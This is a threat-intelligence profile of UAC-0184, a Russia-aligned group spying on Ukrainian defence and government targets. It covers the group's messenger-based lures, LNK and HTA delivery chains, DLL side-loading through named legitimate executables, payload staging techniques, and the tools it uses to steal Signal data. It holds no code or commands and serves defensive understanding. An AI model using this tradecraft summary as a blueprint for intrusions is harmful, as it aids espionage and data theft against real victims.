UAC-0184

UAC-0184 is a Russia-aligned threat actor, also tracked as Hive0156, UNC5435, MB-0005, and MB-0007. Reporting in the provided content consistently describes the group as conducting cyber-espionage operations primarily against Ukrainian military and government entities, especially representatives of the Defense Forces of Ukraine, and in some cases the Verkhovna Rada. CERT-UA reported increased activity during 2024 focused on gaining access to victims’ computers in order to steal documents and messenger data. The group relies heavily on social engineering and messenger-based delivery. Reported initial access vectors include popular messengers, dating websites, and specifically Viber, as well as lures themed around criminal or enforcement proceedings, combat videos, military administration, compensation issues, and acquaintance or romance pretexts. Multiple campaigns used ZIP archives containing malicious LNK files disguised as documents, spreadsheets, images, PDFs, DOCX, RTF, or XLSX files. Observed tradecraft includes LNK-based execution, PowerShell downloader chains, use of bitsadmin and mshta to retrieve and execute HTA payloads, and staged delivery through ZIP archives. The content describes repeated use of DLL side-loading and search-order hijacking with legitimate software as cover, including Plane9 components, Microsoft-signed VSLauncher.exe, Bitdefender Endpoint Security deployer bddeploy.exe, OneDrive-themed ClusterHub.exe, and executables associated with PassMark BurnInTest or PassMark Endpoint. Payload staging and reconstruction techniques directly mentioned in the content include XOR decoding, AES-256-CBC decryption, gzip decompression, LZNT1 decompression, reflective loading of .NET assemblies, pseudo-PNG/IDAT chunk parsing, in-memory payload reconstruction, and module stomping. Malware and tooling directly associated with UAC-0184 in the provided content include HijackLoader/IDATLoader, SHADOWLADDER, GHOSTPULSE, Remcos RAT, ViottoKeylogger, XWorm, SIGTOP, and TUSC. CERT-UA states SIGTOP and TUSC are used to steal and exfiltrate data from compromised systems, including Signal messages and contact data. Several analyses in the content describe HijackLoader or related IDAT-based loaders ultimately deploying Remcos RAT. Other reporting in the content links the actor to XWorm and Remcos in multi-stage attacks. The actor’s targeting and objectives, as directly stated in the content, are intelligence gathering and theft of documents and messenger data from Ukrainian military- and government-related victims. The content also notes use of geofenced or gated payload delivery in some campaigns and repeated use of military-themed decoys to match the victim set.